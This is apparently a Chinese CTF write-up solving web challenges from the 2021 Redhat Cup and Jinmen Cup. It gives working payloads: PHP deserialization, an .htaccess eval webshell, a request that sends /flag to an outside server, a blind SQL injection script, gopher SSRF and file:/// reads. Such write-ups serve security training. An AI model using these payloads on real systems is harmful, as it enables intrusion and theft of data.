CTF笔记(十三)——2021红帽杯&津门杯Web

内容纲要

津门杯

power_cut

<?php
class logger{
    public $logFile;
    public $initMsg;
    public $exitMsg;

    function __construct($file){
        // initialise variables
        $this->initMsg="#--session started--#\n";
        $this->exitMsg="#--session end--#\n";
        $this->logFile =  $file;
        readfile($this->logFile);

    }

    function log($msg){
        $fd=fopen($this->logFile,"a+");
        fwrite($fd,$msg."\n");
        fclose($fd);
    }

    function __destruct(){
        echo "this is destruct";
    }
}

class weblog {
    public $weblogfile;

    function __construct() {
        $flag="system('echo flag{123}')";
        echo "$flag";
    }

    function __wakeup(){
        // self::waf($this->filepath);
        $obj = new logger($this->weblogfile);
    }

    public function waf($str){
        $str=preg_replace("/[<>*#'|?\n ]/","",$str);
        $str=str_replace('flag','',$str);
        return $str;
    }

    function __destruct(){
        echo "this is destruct";
    }

}

$log = $_GET['log'];
$log = preg_replace("/[<>*#'|?\n ]/","",$log);
$log = str_replace('flag','',$log);
$log_unser = unserialize($log);

?>

readfile直接回显输出

payload

log=O:6:"weblog":1:{s:10:"weblogfile";s:5:"/flflagag";}

uploadhub

上传.htaccess

<FilesMatch "index"> 
SetHandler application/x-httpd-php
php_flag engine on
Require all granted
</FilesMatch>
#start:<?php eval($_GET['cmd']);?>:end
php_value auto_prepend_file ".htaccess"

随便上传一个带index的文件,执行就行

hate_php

一开始尝试异或取反来绕过正则,比如下面这个

(~%8F%97%8F%96%91%99%90)();

结果不行,找原因,发现PHP版本是5.6

然后找到这篇

无字母数字Webshell之提高篇_执行 (sohu.com)

因为是eval,不是system,而且因为过滤不能在eval里用system,只能用““.

所以没有回显,因此尝试写文件后访问,结果写不了,尝试curl或者wget传参回自己服务器结果也不行,最后想到可以用shell执行php的file_get_contents来访问自己服务器。构造post报文如下

POST /?code=`.%20/???/????????[?-[]`; HTTP/1.1
Host: 122.112.214.101:20004
Content-Length: 389
Pragma: no-cache
Cache-Control: no-cache
Origin: http://122.112.214.101:20004/
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryflRQ1tAa2PBCh9My
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.56
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
x-forwarded-for: 165.62.3.27
Connection: close

------WebKitFormBoundaryflRQ1tAa2PBCh9My
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: application/octet-stream

#!/bin/sh
a=`cat /flag`;php -r "file_get_contents('http://3423.cn1.utools.club/a.php?nani=$a');"
------WebKitFormBoundaryflRQ1tAa2PBCh9My
Content-Disposition: form-data; name="submit"

提交
------WebKitFormBoundaryflRQ1tAa2PBCh9My--

自己的服务器里就有flag了

easysql

这题有点难

先得扫目录发现有admin.php,不过直接访问会被302跳转到index.php

使用curl gopher访问admin.php可以访问

然后根据提示尝试post传参poc尝试注入

盲注脚本如下,注意需要根据长度修改content-length的值

# by CubeStone
import requests
import time
import sys

def Injector(url,length,sleep,method=None,data=None,known="",sign=None):
    sign=sign if method=="post" else method
    basename=known
    length=int(length)
    sleep=float(sleep)
    for i in range(1,length+1):
        try:
            if basename[-1]==&#39;\0&#39;:
                break
        except:pass
        l=31;r=128;p=(l+r)//2
        while l<r:
            print(chr(p),end="\r")
            try:
                if method!="post":
                    res=requests.get(url.replace("76",str(len(str(p))-2+len(str(len(known)+i))-1+76)).format(char=p,length=len(known)+i),timeout=5)
                else:
                    res=requests.post(url,data=bytes(data.format(char=p,length=len(known)+i),encoding="utf-8"),timeout=2,headers={"content-type":"application/x-www-form-urlencoded"})
            except Exception as e:
                l=p+1
            else:
                if sign==None:
                    r=p
                elif sign not in res.text:
                    l=p+1
                else:
                    r=p
            p=(l+r)//2
        basename+=chr(p)
        print(basename)
        if sleep!=0:time.sleep(sleep)
    return(basename)
if __name__ == "__main__":
    if len(sys.argv) <=2:
        print("usage: python3 AutoInjector.py <url:http://xxx?\\payload> <length> <sleep> [<method:post> <data:\\payload>] [knownwords] [suscess_sign] \n\\payload:must include &#39;{length}&#39; &#39;{char}&#39;,and &#39;sleep(2)&#39; if no [sucess_sign]\nExample: python3 BlindInjector.py \"http://826a3fbc-cf97-4e95-95bf-5bae549406a0.node3.buuoj.cn/check.php?username=&#39; or sleep(2) and ascii(mid((SELECT TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = &#39;geek&#39;),{length},1)>{char} and &#39;1&password=683union\" 20 0.2")
    else:
#         print(sys.argv)
        Injector(*sys.argv[1:])
        print("                                                  ")

payload如下

python .\CompareInjector.py "http://121.36.147.29:20001/?url=gopher%3A%2F%2F127.0.0.1%3A80%2F_POST%20%2Fadmin.php%20HTTP%2F1.1%250d%250aHost%3A%20localhost%3A80%250d%250aConnection%3A%20close%250d%250aContent-Type%3A%20application%2Fx-www-form-urlencoded%250d%250aContent-Length%3A%2076%250d%250a%250d%250apoc%253D1)%2520and%2520if(ascii(mid((SELECT%2520%2560flag%2560%2520FROM%2520%2560flag%2560)%252C{length}%252C1))%253E{char}%252Csleep(9)%252C0)%2520--%2520" 40 0.2

红帽杯

find_it

扫目录发现robots.txt

发现index.php有备份:

.1ndexx.php.swp

拿到源码,审计发现可以写文件,尝试写个phpinfo

?code=<?php%20phpinfo();?>

结果发现phpinfo里有flag。

framework

yiiframework框架题,盲猜是cve,百度到去年yii2有个反序列化漏洞,根据网上复现的blog,yii的版本要小于2.0.35,题目提供了源码,看了一下版本是2.0.32估计就是这个洞了。审计一下发现sitecontroller里有unserialize可利用。本地搭环境复现成功。

websitemanager

F12发现图片是用image.php?id=xxx载入的,尝试注入获取用户名密码

if(ascii(mid((select%0agroup_concat(password)from(users)),%d,1))>%d,1,0)

登陆成功跳到curl.php,尝试file协议读flag文件

file:///flag

完成

不说点什么喵?

1 × 3 =

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据